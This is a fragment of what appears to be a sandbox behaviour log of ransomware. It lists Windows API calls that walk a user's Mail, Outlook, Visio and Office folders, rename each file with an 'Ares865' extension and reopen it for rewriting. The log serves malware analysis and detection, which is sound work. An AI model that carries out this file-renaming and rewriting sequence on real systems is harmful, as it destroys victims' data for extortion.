GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237) returned 1 [0098.797] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.Ares865") returned 103 [0098.797] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.ares865"), dwFlags=0x1) returned 1 [0098.798] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.799] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4734) returned 1 [0098.802] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.Ares865") returned 100 [0098.802] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\soft blue.htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\soft blue.htm.ares865"), dwFlags=0x1) returned 1 [0098.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\soft blue.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.803] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=232) returned 1 [0098.808] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.Ares865") returned 99 [0098.808] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\softblue.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\softblue.jpg.ares865"), dwFlags=0x1) returned 1 [0098.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\softblue.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.810] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10569) returned 1 [0098.813] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.Ares865") returned 96 [0098.813] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\stars.htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\stars.htm.ares865"), dwFlags=0x1) returned 1 [0098.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\stars.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.815] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=230) returned 1 [0098.823] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.Ares865") returned 96 [0098.823] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\stars.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\stars.jpg.ares865"), dwFlags=0x1) returned 1 [0098.824] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\stationery\\stars.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.824] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7505) returned 1 [0098.828] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup" [0098.829] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old" [0098.829] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.Ares865") returned 99 [0098.829] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\backup\\old\\edb00001.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\backup\\old\\edb00001.log.ares865"), dwFlags=0x1) returned 1 [0098.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\backup\\old\\edb00001.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.831] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2097152) returned 1 [0098.977] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore.Ares865") returned 113 [0098.977] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore.ares865"), dwFlags=0x1) returned 1 [0098.979] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0098.979] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2121728) returned 1 [0099.203] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat.Ares865") returned 102 [0099.203] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\backup\\old\\windowsmail.pat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\backup\\old\\windowsmail.pat.ares865"), dwFlags=0x1) returned 1 [0099.205] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\backup\\old\\windowsmail.pat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.205] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16384) returned 1 [0099.218] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Visio", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Visio") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Visio" [0099.221] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Visio\\content14.dat.Ares865") returned 82 [0099.221] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\visio\\content14.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Visio\\content14.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\visio\\content14.dat.ares865"), dwFlags=0x1) returned 1 [0099.223] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Visio\\content14.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\visio\\content14.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.223] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=101600) returned 1 [0099.234] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Visio\\thumbs.dat.Ares865") returned 79 [0099.234] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\visio\\thumbs.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Visio\\thumbs.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\visio\\thumbs.dat.ares865"), dwFlags=0x1) returned 1 [0099.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Visio\\thumbs.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\visio\\thumbs.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.237] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=128000) returned 1 [0099.249] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\TaskSchedulerConfig", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\TaskSchedulerConfig") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\TaskSchedulerConfig" [0099.250] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Publisher", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Publisher") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Publisher" [0099.250] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook" [0099.251] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\mapisvc.inf.Ares865") returned 82 [0099.251] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\outlook\\mapisvc.inf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\mapisvc.inf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\outlook\\mapisvc.inf.ares865"), dwFlags=0x1) returned 1 [0099.252] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\mapisvc.inf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\outlook\\mapisvc.inf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.252] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1122) returned 1 [0099.255] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\Outlook.sharing.xml.obi.Ares865") returned 94 [0099.255] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\outlook\\outlook.sharing.xml.obi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\Outlook.sharing.xml.obi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\outlook\\outlook.sharing.xml.obi.ares865"), dwFlags=0x1) returned 1 [0099.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\Outlook.sharing.xml.obi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\outlook\\outlook.sharing.xml.obi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.257] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=185) returned 1 [0099.264] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\RoamCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\RoamCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\RoamCache" [0099.265] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat.Ares865") returned 139 [0099.265] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat.ares865"), dwFlags=0x1) returned 1 [0099.267] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.267] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=260) returned 1 [0099.273] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office" [0099.273] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\ONetConfig", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\ONetConfig") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\ONetConfig" [0099.274] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig.Ares865") returned 117 [0099.274] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig.ares865"), dwFlags=0x1) returned 1 [0099.275] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.275] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=128) returned 1 [0099.278] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\Groove", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\Groove") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\Groove" [0099.279] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\Groove\\User", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\Groove\\User") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\Groove\\User" [0099.279] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\Groove\\System", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\Groove\\System") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\Groove\\System" [0099.280] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0" [0099.280] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache" [0099.281] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD.Ares865") returned 103 [0099.281] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd.ares865"), dwFlags=0x1) returned 1 [0099.282] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.283] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=131072) returned 1 [0099.297] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD.Ares865") returned 137 [0099.297] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd.ares865"), dwFlags=0x1) returned 1 [0099.298] 